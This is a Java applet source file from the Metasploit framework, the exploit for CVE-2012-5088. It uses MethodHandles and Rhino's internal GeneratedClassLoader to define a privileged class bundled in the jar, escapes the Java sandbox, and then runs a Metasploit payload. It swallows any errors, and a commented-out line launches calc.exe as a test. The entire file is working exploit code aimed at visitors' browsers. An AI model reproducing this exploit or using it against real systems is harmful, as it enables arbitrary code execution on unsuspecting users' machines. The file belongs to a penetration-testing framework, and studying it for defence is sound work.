metasploit-framework/external/source/exploits/cve-2012-5088/Exploit.java

67 lines
3.5 KiB
Java
Executable File

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import metasploit.Payload;
//import java.lang.Runtime;
import java.applet.Applet;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.Method;
public class Exploit extends Applet
{
public Exploit()
{
}
public void init()
{
try
{
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] buffer = new byte[8192];
int length;
// read in the class file from the jar
InputStream is = getClass().getResourceAsStream("B.class");
// and write it out to the byte array stream
while( ( length = is.read( buffer ) ) > 0 )
bos.write( buffer, 0, length );
// convert it to a simple byte array
buffer = bos.toByteArray();
MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
MethodType localMethodType0 = MethodType.methodType(Class.class, String.class);
MethodHandle localMethodHandle0 = localLookup.findStatic(Class.class, "forName", localMethodType0);
Class localClass1 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.Context" });
Class localClass2 = (Class)localMethodHandle0.invokeWithArguments(new Object[] { "sun.org.mozilla.javascript.internal.GeneratedClassLoader" });
MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
localClass3.newInstance();
Payload.main(null);
//Runtime.getRuntime().exec("calc.exe");
}
catch(Throwable ex)
{
//ex.printStackTrace();
}
}
}